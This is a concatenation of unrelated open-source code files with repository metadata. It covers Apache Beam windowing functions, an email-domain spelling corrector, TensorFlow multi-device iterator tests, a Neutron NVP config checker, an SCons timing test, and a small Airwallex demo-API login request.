def to_runner_api_parameter(self, context):
return (urns.FIXED_WINDOWS_FN,
proto_utils.pack_Struct(size=self.size.micros,
offset=self.offset.micros))
@urns.RunnerApiFn.register_urn(urns.FIXED_WINDOWS_FN, struct_pb2.Struct)
def from_runner_api_parameter(fn_parameter, unused_context):
return FixedWindows(
size=Duration(micros=fn_parameter['size']),
offset=Timestamp(micros=fn_parameter['offset']))
class SlidingWindows(NonMergingWindowFn):
"""A windowing function that assigns each element to a set of sliding windows.
The attributes size and offset determine in what time interval a timestamp
will be slotted. The time intervals have the following formula:
[N * period + offset, N * period + offset + size)
Attributes:
size: Size of the window as seconds.
period: Period of the windows as seconds.
offset: Offset of this window as seconds since Unix epoch. Windows start at
t=N * period + offset where t=0 is the epoch. The offset must be a value
in range [0, period). If it is not it will be normalized to this range.
"""
def __init__(self, size, period, offset=0):
if size <= 0:
raise ValueError('The size parameter must be strictly positive.')
self.size = Duration.of(size)
self.period = Duration.of(period)
self.offset = Timestamp.of(offset) % period
def assign(self, context):
timestamp = context.timestamp
start = timestamp - ((timestamp - self.offset) % self.period)
return [
IntervalWindow(Timestamp(micros=s), Timestamp(micros=s) + self.size)
for s in range(start.micros, timestamp.micros - self.size.micros,
-self.period.micros)]
def get_window_coder(self):
return coders.IntervalWindowCoder()
def __eq__(self, other):
if type(self) == type(other) == SlidingWindows:
return (self.size == other.size
and self.offset == other.offset
and self.period == other.period)
def to_runner_api_parameter(self, context):
return (urns.SLIDING_WINDOWS_FN,
proto_utils.pack_Struct(
size=self.size.micros,
offset=self.offset.micros,
period=self.period.micros))
@urns.RunnerApiFn.register_urn(urns.SLIDING_WINDOWS_FN, struct_pb2.Struct)
def from_runner_api_parameter(fn_parameter, unused_context):
return SlidingWindows(
size=Duration(micros=fn_parameter['size']),
offset=Timestamp(micros=fn_parameter['offset']),
period=Duration(micros=fn_parameter['period']))
class Sessions(WindowFn):
"""A windowing function that groups elements into sessions.
A session is defined as a series of consecutive events
separated by a specified gap size.
Attributes:
gap_size: Size of the gap between windows as floating-point seconds.
"""
def __init__(self, gap_size):
if gap_size <= 0:
raise ValueError('The size parameter must be strictly positive.')
self.gap_size = Duration.of(gap_size)
def assign(self, context):
timestamp = context.timestamp
return [IntervalWindow(timestamp, timestamp + self.gap_size)]
def get_window_coder(self):
return coders.IntervalWindowCoder()
def merge(self, merge_context):
to_merge = []
end = MIN_TIMESTAMP
for w in sorted(merge_context.windows, key=lambda w: w.start):
if to_merge:
if end > w.start:
to_merge.append(w)
if w.end > end:
end = w.end
else:
if len(to_merge) > 1:
merge_context.merge(to_merge,
IntervalWindow(to_merge[0].start, end))
to_merge = [w]
end = w.end
else:
to_merge = [w]
end = w.end
if len(to_merge) > 1:
merge_context.merge(to_merge, IntervalWindow(to_merge[0].start, end))
def __eq__(self, other):
if type(self) == type(other) == Sessions:
return self.gap_size == other.gap_size
@urns.RunnerApiFn.register_urn(urns.SESSION_WINDOWS_FN, struct_pb2.Struct)
def from_runner_api_parameter(fn_parameter, unused_context):
return Sessions(gap_size=Duration(micros=fn_parameter['gap_size']))
def to_runner_api_parameter(self, context):
return (urns.SESSION_WINDOWS_FN,
proto_utils.pack_Struct(gap_size=self.gap_size.micros))
| {
"content_hash": "398f54e28c5518765e383f60cc7b2857",
"timestamp": "",
"source": "github",
"line_count": 444,
"max_line_length": 100,
"avg_line_length": 32.560810810810814,
"alnum_prop": 0.6971709206612714,
"repo_name": "dhalperi/incubator-beam",
"id": "94187e0c5d54d14b065431deb675f422f4fb9a3a",
"size": "15242",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sdks/python/apache_beam/transforms/window.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Groovy",
"bytes": "22449"
},
{
"name": "Java",
"bytes": "9735468"
},
{
"name": "Protocol Buffer",
"bytes": "1407"
},
{
"name": "Shell",
"bytes": "10104"
}
],
"symlink_target": ""
} |
"""
Spelling corrector library, used to correct common typos in domains like
gmal.com instead of gmail.com.
The spelling corrector uses difflib which in turn uses the
Ratcliff-Obershelp algorithm [1] to compute the similarity of two strings.
This is a very fast an accurate algorithm for domain spelling correction.
The (only) public method this module has is suggest(word), which given
a domain, suggests an alternative or returns the original domain
if no suggestion exists.
[1] http://xlinux.nist.gov/dads/HTML/ratcliffObershelp.html
"""
import difflib
def suggest(word, cutoff=0.77):
"""
Given a domain and a cutoff heuristic, suggest an alternative or return the
original domain if no suggestion exists.
"""
if word in LOOKUP_TABLE:
return LOOKUP_TABLE[word]
guess = difflib.get_close_matches(word, MOST_COMMON_DOMAINS, n=1, cutoff=cutoff)
if guess and len(guess) > 0:
return guess[0]
return word
MOST_COMMON_DOMAINS = [
# mailgun :)
'mailgun.net',
# big esps
'yahoo.com',
'yahoo.ca',
'yahoo.co.jp',
'yahoo.co.uk',
'yahoo.com.br',
'ymail.com',
'hotmail.com',
'hotmail.ca',
'hotmail.co.uk',
'windowslive.com',
'live.com',
'outlook.com',
'msn.com',
'gmail.com',
'googlemail.com',
'aol.com',
'aim.com',
'icloud.com',
'me.com',
'mac.com',
'facebook.com',
# big isps
'comcast.net',
'sbcglobal.net',
'bellsouth.net',
'verizon.net',
'earthlink.net',
'cox.net',
'charter.net',
'shaw.ca',
'bell.net'
]
# domains that the corrector doesn't fix that we should fix
LOOKUP_TABLE = {
u'yahoo': u'yahoo.com',
u'gmail': u'gmail.com',
u'hotmail': u'hotmail.com',
u'live': u'live.com',
u'outlook': u'outlook.com',
u'msn': u'msn.com',
u'googlemail': u'googlemail.com',
u'aol': u'aol.com',
u'aim': u'aim.com',
u'icloud': u'icloud.com',
u'me': u'me.com',
u'mac': u'mac.com',
u'facebook': u'facebook.com',
u'comcast': u'comcast.net',
u'sbcglobal': u'sbcglobal.net',
u'bellsouth': u'bellsouth.net',
u'verizon': u'verizon.net',
u'earthlink': u'earthlink.net',
u'cox': u'cox.net',
u'charter': u'charter.net',
u'shaw': u'shaw.ca',
u'bell': u'bell.net'
}
| {
"content_hash": "e3a91de76b3fbd95f81facc00e1395b4",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 84,
"avg_line_length": 25.872340425531913,
"alnum_prop": 0.5916940789473685,
"repo_name": "xjzhou/flanker",
"id": "498862109e3ed629daceca4fec18aef0a18c579d",
"size": "2447",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "flanker/addresslib/corrector.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "370387"
}
],
"symlink_target": ""
} |
"""Tests for the `MultiDeviceIterator` and `OwnedMultiDeviceIterator` API."""
from absl.testing import parameterized
import numpy as np
from tensorflow.python.data.experimental.ops import testing
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import from_generator_op
from tensorflow.python.data.ops import multi_device_iterator_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import executor
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
cls_combination = combinations.combine(cls=[
combinations.NamedObject("MultiDeviceIterator",
multi_device_iterator_ops.MultiDeviceIterator),
combinations.NamedObject("OwnedMultiDeviceIterator",
multi_device_iterator_ops.OwnedMultiDeviceIterator)
])
class MultiDeviceIteratorCommonTest(test_base.DatasetTestBase,
parameterized.TestCase):
"""Tests that are common to MultiDeviceIterator and OwnedMultiDeviceIterator."""
def setUp(self):
super().setUp()
self._devices = self.configureDevicesForMultiDeviceTest(3)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(), cls_combination))
def testCancelGetNextWithDevice(self, cls):
ping = data_flow_ops.FIFOQueue(capacity=2, dtypes=dtypes.int64)
pong = data_flow_ops.FIFOQueue(capacity=2, dtypes=dtypes.int64)
@def_function.function
def map_fn(v):
ball = ping.dequeue()
with ops.control_dependencies([pong.enqueue(ball)]):
return v + ping.dequeue()
dataset = dataset_ops.Dataset.range(10)
dataset = dataset.map(map_fn)
# We need to set prefetch_buffer_size=0 so that we can cancel the
# MultiDeviceIteratorGetNextFromShardOp from eager. If
# prefetch_buffer_size>0, that op runs in the background threads of the
# prefetch and can only be cancelled by deleting the iterator.
multi_device_iterator = cls(
dataset, [self._devices[1], self._devices[2]], prefetch_buffer_size=0)
@def_function.function
def get_next_device1():
return multi_device_iterator.get_next(self._devices[1])
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
cancel_mgr = cancellation.CancellationManager()
cancel_mgr.get_cancelable_function(
get_next_device1.get_concrete_function())()
# Make sure we cancel in the middle of get_next.
ping.enqueue(0)
pong.dequeue()
cancel_mgr.start_cancel()
with self.assertRaises(errors.CancelledError):
async_executor.wait()
# Note that fetching from upstream iterator is not cancelled with the
# cancellation of get_next.
ping.enqueue(0)
# Cancelling a get_next on one device shouldn't cancel the
# multi_device_iterator and iterators on other devices.
ping.enqueue(0)
ping.enqueue(0)
self.assertEqual(1,
multi_device_iterator.get_next(self._devices[2]).numpy())
# FIXME(b/209534797): Workaround an asan error caused by this test.
# Remove the dangling reference from tf.function to ensure queue objects
# are not freed before they are flushed.
import gc # pylint: disable=g-import-not-at-top
del get_next_device1
gc.collect()
@combinations.generate(
combinations.times(test_base.eager_only_combinations(), cls_combination))
def testEmptyDataset(self, cls):
dataset = dataset_ops.Dataset.range(0)
multi_device_iterator = cls(
dataset, devices=[self._devices[1], self._devices[2]])
with self.assertRaises(errors.OutOfRangeError):
multi_device_iterator.get_next()
@combinations.generate(
combinations.times(test_base.eager_only_combinations(), cls_combination))
def testEmptyDeviceList(self, cls):
dataset = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Length for attr 'devices' of 0 must be at least minimum 1"):
cls(dataset, devices=[])
class MultiDeviceIteratorTest(test_base.DatasetTestBase,
parameterized.TestCase):
def setUp(self):
super(MultiDeviceIteratorTest, self).setUp()
self._devices = self.configureDevicesForMultiDeviceTest(3)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(num_inits=[0, 1, 42])))
def testInitOnly(self, num_inits):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
for _ in range(num_inits):
self.evaluate(multi_device_iterator.initializer)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
max_buffer_size=[0, 1, 10], prefetch_buffer_size=[0, 1, 10])))
def testBasic(self, prefetch_buffer_size, max_buffer_size):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]],
max_buffer_size=max_buffer_size,
prefetch_buffer_size=prefetch_buffer_size)
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual(i, self.evaluate(elem_on_1))
self.assertEqual(i + 1, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.default_test_combinations())
def testOneOnSameDevice(self):
dataset = dataset_ops.Dataset.range(12)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[0], self._devices[1], self._devices[2]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 12, 3):
elem_on_0, elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual(i, self.evaluate(elem_on_0))
self.assertEqual(i + 1, self.evaluate(elem_on_1))
self.assertEqual(i + 2, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elem_on_0, elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_0)
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.default_test_combinations())
def testRepeatDevices(self):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[1]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elements = multi_device_iterator.get_next()
elem_on_1, elem_on_2 = elements
self.assertEqual(i, self.evaluate(elem_on_1))
self.assertEqual(i + 1, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elements = multi_device_iterator.get_next()
elem_on_1, elem_on_2 = elements
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.default_test_combinations())
def testNotFullyDivisible(self):
dataset = dataset_ops.Dataset.range(9)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 8, 2):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual(i, self.evaluate(elem_on_1))
self.assertEqual(i + 1, self.evaluate(elem_on_2))
elem_on_1 = multi_device_iterator.get_next(self._devices[1])
self.assertEqual(8, self.evaluate(elem_on_1))
with self.assertRaises(errors.OutOfRangeError):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.default_test_combinations())
def testGetNextAsOptional(self):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elem_on_1, elem_on_2 = multi_device_iterator.get_next_as_optional()
has_elem_1, get_elem_1 = self.evaluate(
[elem_on_1.has_value(), elem_on_1.get_value()])
has_elem_2, get_elem_2 = self.evaluate(
[elem_on_2.has_value(), elem_on_2.get_value()])
self.assertTrue(has_elem_1)
self.assertEqual(i, get_elem_1)
self.assertTrue(has_elem_2)
self.assertEqual(i + 1, get_elem_2)
elem_on_1, elem_on_2 = multi_device_iterator.get_next_as_optional()
has_elem_1 = elem_on_1.has_value()
has_elem_2 = elem_on_2.has_value()
self.assertFalse(self.evaluate(has_elem_1))
self.assertFalse(self.evaluate(has_elem_2))
with self.assertRaises(errors.InvalidArgumentError):
elem_1 = elem_on_1.get_value()
self.evaluate(elem_1)
with self.assertRaises(errors.InvalidArgumentError):
elem_2 = elem_on_2.get_value()
self.evaluate(elem_2)
@combinations.generate(test_base.default_test_combinations())
def testUneven(self):
dataset = dataset_ops.Dataset.range(10)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]], max_buffer_size=4)
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elem_on_1 = multi_device_iterator.get_next(self._devices[1])
self.assertEqual(i, self.evaluate(elem_on_1))
for i in range(0, 10, 2):
elem_on_2 = multi_device_iterator.get_next(self._devices[2])
self.assertEqual(i + 1, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
@combinations.generate(test_base.graph_only_combinations())
def testMultipleInitializationsGraph(self):
dataset1 = dataset_ops.Dataset.range(1000)
dataset2 = dataset_ops.Dataset.range(1000)
dataset = dataset_ops.Dataset.zip((dataset1, dataset2))
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]], prefetch_buffer_size=4)
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
for _ in range(5):
self.evaluate(multi_device_iterator.initializer)
self.assertEqual([(0, 0), (1, 1)], self.evaluate([elem_on_1, elem_on_2]))
@combinations.generate(test_base.eager_only_combinations())
def testMultipleInitializationsEager(self):
dataset1 = dataset_ops.Dataset.range(1000)
dataset2 = dataset_ops.Dataset.range(1000)
dataset = dataset_ops.Dataset.zip((dataset1, dataset2))
for _ in range(5):
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]], prefetch_buffer_size=4)
self.evaluate(multi_device_iterator.initializer)
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual([(0, 0), (1, 1)], self.evaluate([elem_on_1, elem_on_2]))
@combinations.generate(test_base.default_test_combinations())
def testOptimization(self):
dataset = dataset_ops.Dataset.range(10)
dataset = dataset.apply(testing.assert_next(["MemoryCacheImpl"]))
dataset = dataset.skip(0) # this should be optimized away
dataset = dataset.cache()
options = options_lib.Options()
options.experimental_optimization.noop_elimination = True
dataset = dataset.with_options(options)
multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
self.evaluate(multi_device_iterator.initializer)
for i in range(0, 10, 2):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.assertEqual(i, self.evaluate(elem_on_1))
self.assertEqual(i + 1, self.evaluate(elem_on_2))
with self.assertRaises(errors.OutOfRangeError):
elem_on_1, elem_on_2 = multi_device_iterator.get_next()
self.evaluate(elem_on_1)
self.evaluate(elem_on_2)
class OwnedMultiDeviceIteratorTest(test_base.DatasetTestBase,
parameterized.TestCase):
def setUp(self):
super(OwnedMultiDeviceIteratorTest, self).setUp()
self._devices = self.configureDevicesForMultiDeviceTest(3)
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(
max_buffer_size=[0, 1, 10], prefetch_buffer_size=[0, 1, 10])))
def testBasic(self, max_buffer_size, prefetch_buffer_size):
dataset = dataset_ops.Dataset.range(1000)
mdi = multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]],
max_buffer_size=max_buffer_size,
prefetch_buffer_size=prefetch_buffer_size)
for i, el in enumerate(mdi):
self.assertEqual([i * 2, i * 2 + 1], [el[0].numpy(), el[1].numpy()])
@combinations.generate(test_base.eager_only_combinations())
def testBasicFunction(self):
queue = data_flow_ops.FIFOQueue(10, dtypes.int64)
@def_function.function
def fn():
with ops.device(self._devices[0]):
dataset = dataset_ops.Dataset.range(10)
iterator = multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
for _ in range(5):
el0, el1 = next(iterator)
queue.enqueue(el0)
queue.enqueue(el1)
fn()
for i in range(10):
self.assertEqual(queue.dequeue().numpy(), i)
@combinations.generate(test_base.eager_only_combinations())
def testFunctionError(self):
# In this test we verify that a function that raises an error ends up
# properly deallocating the iterator resource.
queue = data_flow_ops.FIFOQueue(10, dtypes.int64)
queue.enqueue(0)
def init_fn(n):
return n
def next_fn(_):
ds = dataset_ops.Dataset.range(0)
return next(iter(ds))
def finalize_fn(n):
queue.enqueue(0)
return n
@def_function.function
def fn():
dataset = from_generator_op._GeneratorDataset(
1,
init_fn,
next_fn,
finalize_fn,
output_signature=tensor_spec.TensorSpec([], dtypes.int64))
iterator = multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]])
next(iterator)
with self.assertRaises(errors.OutOfRangeError):
fn()
self.assertEqual(queue.size().numpy(), 2)
@combinations.generate(test_base.eager_only_combinations())
def testMultipleInitializations(self):
dataset = dataset_ops.Dataset.range(1000)
for _ in range(5):
multi_device_iterator = (
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]]))
for i, el in enumerate(multi_device_iterator):
self.assertEqual([i * 2, i * 2 + 1], [el[0].numpy(), el[1].numpy()])
@combinations.generate(test_base.eager_only_combinations())
def testLimitedRetracing(self):
trace_count = [0]
@def_function.function
def f(iterator):
trace_count[0] += 1
counter = np.int64(0)
for _ in range(5):
elem = next(iterator)
counter += elem[0]
counter += elem[1]
return counter
dataset = dataset_ops.Dataset.range(10)
dataset2 = dataset_ops.Dataset.range(20)
for _ in range(10):
multi_device_iterator = (
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, [self._devices[1], self._devices[2]]))
self.assertEqual(self.evaluate(f(multi_device_iterator)), 45)
multi_device_iterator2 = (
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset2, [self._devices[1], self._devices[2]]))
self.assertEqual(self.evaluate(f(multi_device_iterator2)), 45)
self.assertEqual(trace_count[0], 1)
@combinations.generate(test_base.eager_only_combinations())
def testMissingDevices(self):
dataset = dataset_ops.Dataset.range(1000)
with self.assertRaisesRegex(ValueError, "`devices` must be provided."):
multi_device_iterator_ops.OwnedMultiDeviceIterator(dataset)
@combinations.generate(test_base.eager_only_combinations())
def testMissingInput(self):
with self.assertRaisesRegex(
ValueError,
"When `dataset` is not provided, both `components` and `element_spec` "
"must be specified."):
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset=None, devices=[self._devices[1], self._devices[2]])
@combinations.generate(test_base.eager_only_combinations())
def testExtraElementSpecInput(self):
dataset = dataset_ops.Dataset.range(1000)
with self.assertRaisesRegex(
ValueError,
"When `dataset` is provided, `element_spec` and `components` must "
"not be specified."):
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, devices=[self._devices[1], self._devices[2]],
element_spec=dataset.element_spec)
@combinations.generate(test_base.graph_only_combinations())
def testGraphMode(self):
dataset = dataset_ops.Dataset.range(1000)
with self.assertRaisesRegex(
RuntimeError,
"OwnedMultiDeviceIterator is only supported inside of tf.function or "
"when eager execution is enabled."):
multi_device_iterator_ops.OwnedMultiDeviceIterator(
dataset, devices=[self._devices[1], self._devices[2]])
if __name__ == "__main__":
test.main()
| {
"content_hash": "7fbad2617c48dad5e29dc3fc560aa4c7",
"timestamp": "",
"source": "github",
"line_count": 462,
"max_line_length": 82,
"avg_line_length": 40.108225108225106,
"alnum_prop": 0.6859686994063681,
"repo_name": "tensorflow/tensorflow",
"id": "a544842f4c45beeead44230473c990413b1fc0a2",
"size": "19219",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/python/data/kernel_tests/multi_device_iterator_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "36962"
},
{
"name": "C",
"bytes": "1400913"
},
{
"name": "C#",
"bytes": "13584"
},
{
"name": "C++",
"bytes": "126099822"
},
{
"name": "CMake",
"bytes": "182430"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "416133"
},
{
"name": "Go",
"bytes": "2129888"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1074438"
},
{
"name": "Jupyter Notebook",
"bytes": "792906"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "11447433"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "172666"
},
{
"name": "Objective-C++",
"bytes": "300213"
},
{
"name": "Pawn",
"bytes": "5552"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "42782002"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "9199"
},
{
"name": "Shell",
"bytes": "621854"
},
{
"name": "Smarty",
"bytes": "89538"
},
{
"name": "SourcePawn",
"bytes": "14625"
},
{
"name": "Starlark",
"bytes": "7738020"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import sys
from oslo.config import cfg
from neutron.common import config
from neutron.plugins.nicira.common import config as nvp_cfg # noqa
from neutron.plugins.nicira import NeutronPlugin
from neutron.plugins.nicira import nvplib
config.setup_logging(cfg.CONF)
def help(name):
print("Usage: %s path/to/nvp.ini" % name)
sys.exit(1)
def get_gateway_services(cluster):
ret_gw_services = {"L2GatewayServiceConfig": [],
"L3GatewayServiceConfig": []}
gw_services = nvplib.get_gateway_services(cluster).get('results', [])
for gw_service in gw_services:
ret_gw_services[gw_service['type']].append(gw_service['uuid'])
return ret_gw_services
def get_transport_zones(cluster):
transport_zones = nvplib.get_transport_zones(cluster).get('results')
return [transport_zone['uuid'] for transport_zone in transport_zones]
def main(argv):
if len(argv) != 2:
help(argv[0])
args = ['--config-file']
args.append(argv[1])
config.parse(args)
print("----------------------- Database Options -----------------------")
print("\tconnection: %s" % cfg.CONF.database.connection)
print("\tretry_interval: %d" % cfg.CONF.database.retry_interval)
print("\tmax_retries: %d" % cfg.CONF.database.max_retries)
print("----------------------- NVP Options -----------------------")
print("\tNVP Generation Timeout %d" % cfg.CONF.NVP.nvp_gen_timeout)
print("\tNumber of concurrent connections to each controller %d" %
cfg.CONF.NVP.concurrent_connections)
print("\tmax_lp_per_bridged_ls: %s" % cfg.CONF.NVP.max_lp_per_bridged_ls)
print("\tmax_lp_per_overlay_ls: %s" % cfg.CONF.NVP.max_lp_per_overlay_ls)
print("----------------------- Cluster Options -----------------------")
print("\trequested_timeout: %s" % cfg.CONF.req_timeout)
print("\tretries: %s" % cfg.CONF.retries)
print("\tredirects: %s" % cfg.CONF.redirects)
print("\thttp_timeout: %s" % cfg.CONF.http_timeout)
cluster = NeutronPlugin.create_nvp_cluster(
cfg.CONF,
cfg.CONF.NVP.concurrent_connections,
cfg.CONF.NVP.nvp_gen_timeout)
num_controllers = len(cluster.nvp_controllers)
print("Number of controllers found: %s" % num_controllers)
if num_controllers == 0:
print("You must specify at least one controller!")
sys.exit(1)
for controller in cluster.nvp_controllers:
print("\tController endpoint: %s" % controller)
nvplib.check_cluster_connectivity(cluster)
gateway_services = get_gateway_services(cluster)
default_gateways = {
"L2GatewayServiceConfig": cfg.CONF.default_l2_gw_service_uuid,
"L3GatewayServiceConfig": cfg.CONF.default_l3_gw_service_uuid}
errors = 0
for svc_type in default_gateways.keys():
for uuid in gateway_services[svc_type]:
print("\t\tGateway(%s) uuid: %s" % (svc_type, uuid))
if (default_gateways[svc_type] and
default_gateways[svc_type] not in gateway_services):
print("\t\t\tError: specified default %s gateway (%s) is "
"missing from NVP Gateway Services!" % (svc_type,
default_gateways[svc_type]))
errors += 1
transport_zones = get_transport_zones(cluster)
print("\tTransport zones: %s" % transport_zones)
if cfg.CONF.default_tz_uuid not in transport_zones:
print("\t\tError: specified default transport zone "
"(%s) is missing from NVP transport zones!"
% cfg.CONF.default_tz_uuid)
errors += 1
if errors:
print("\nThere are %d errors with your configuration. "
" Please, revise!" % errors)
sys.exit(1)
else:
print("Done.")
| {
"content_hash": "20d8ec0b3aef5504ea657da9aa6222d1",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 77,
"avg_line_length": 40.85263157894737,
"alnum_prop": 0.6104096882246843,
"repo_name": "netscaler/neutron",
"id": "092dfba326028d65d9371e29e696db81db42a538",
"size": "4588",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neutron/plugins/nicira/check_nvp_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Python",
"bytes": "6924102"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Verify the obj --stage option.
"""
import TestSCons_time
test = TestSCons_time.TestSCons_time()
test.fake_logfile('foo-000-0.log', 0)
test.fake_logfile('foo-000-1.log', 0)
test.fake_logfile('foo-000-2.log', 0)
test.fake_logfile('foo-001-0.log', 1)
test.fake_logfile('foo-001-1.log', 1)
test.fake_logfile('foo-001-2.log', 1)
expect = """\
set key bottom left
plot '-' title "Startup" with lines lt 1, \\
'-' title "Full build" with lines lt 2, \\
'-' title "Up-to-date build" with lines lt 3
# Startup
0 50%(index)s0.000
1 50%(index)s1.000
e
# Full build
0 50%(index)s0.000
1 50%(index)s1.000
e
# Up-to-date build
0 50%(index)s0.000
1 50%(index)s1.000
e
"""
pre_read = expect % {'index' : 1}
post_read = expect % {'index' : 2}
pre_build = expect % {'index' : 3}
post_build = expect % {'index' : 4}
test.run(arguments = 'obj --fmt gnuplot --stage pre-read Action.ListAction',
stdout=pre_read)
test.run(arguments = 'obj --fmt gnuplot --stage=post-read Action.ListAction',
stdout=post_read)
test.run(arguments = 'obj --fmt gnuplot --stage=pre-build Action.ListAction',
stdout=pre_build)
test.run(arguments = 'obj --fmt gnuplot --stage post-build Action.ListAction',
stdout=post_build)
expect = """\
scons-time: obj: Unrecognized stage "unknown".
Type "scons-time help obj" for help.
"""
test.run(arguments = 'obj --fmt gnuplot --stage unknown',
status = 1,
stderr = expect)
test.pass_test()
| {
"content_hash": "2596871afd6806ec6500a0011c8ee258",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 78,
"avg_line_length": 24.1875,
"alnum_prop": 0.6369509043927648,
"repo_name": "datalogics/scons",
"id": "5dbd15b98432d7f31e159eac54e98d747f1b3214",
"size": "2650",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/scons-time/obj/stage.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1519"
},
{
"name": "HTML",
"bytes": "43855"
},
{
"name": "Perl",
"bytes": "23384"
},
{
"name": "Python",
"bytes": "4756209"
},
{
"name": "Shell",
"bytes": "13866"
}
],
"symlink_target": ""
} |
import http.client
conn = http.client.HTTPSConnection("api-demo.airwallex.com", 443, timeout=10)
payload = "{}"
headers = {
"Content-Type": "application/json",
"x-api-key": "",
"x-client-id": ""
}
conn.request("POST", "/api/v1/authentication/login", payload, headers)
res = conn.getresponse()
data = res.read()
print(data.decode("utf-8")) | {
